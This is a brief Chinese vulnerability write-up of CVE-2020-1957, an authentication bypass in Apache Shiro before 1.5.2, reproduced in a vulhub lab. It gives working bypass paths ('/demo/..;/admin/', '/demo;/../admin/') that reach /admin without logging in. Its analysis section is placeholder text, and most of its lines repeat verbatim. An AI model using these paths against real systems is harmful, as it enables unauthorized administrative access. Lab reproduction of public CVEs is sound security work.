(CVE-2020-1957)Apache Shiro 身份认证绕过漏洞
0x01.漏洞简述
Apache Shiro 1.5.2之前版本中存在安全漏洞。攻击者可借助特制的请求利用该漏洞绕过身份验证。
0x02.影响版本
Apache Shiro < v1.5.2
0x03.漏洞分析
轮子轮子
0x03.漏洞复现
环境搭建
vulhub
admin认证绕过
直接访问/admin,跳转到登入页面
绕过:/demo/..;/admin/ 或 /demo;/../admin/
Apache Shiro 1.5.2之前版本中存在安全漏洞。攻击者可借助特制的请求利用该漏洞绕过身份验证。
Apache Shiro < v1.5.2
轮子轮子
环境搭建
vulhub
admin认证绕过
直接访问/admin,跳转到登入页面
绕过:/demo/..;/admin/ 或 /demo;/../admin/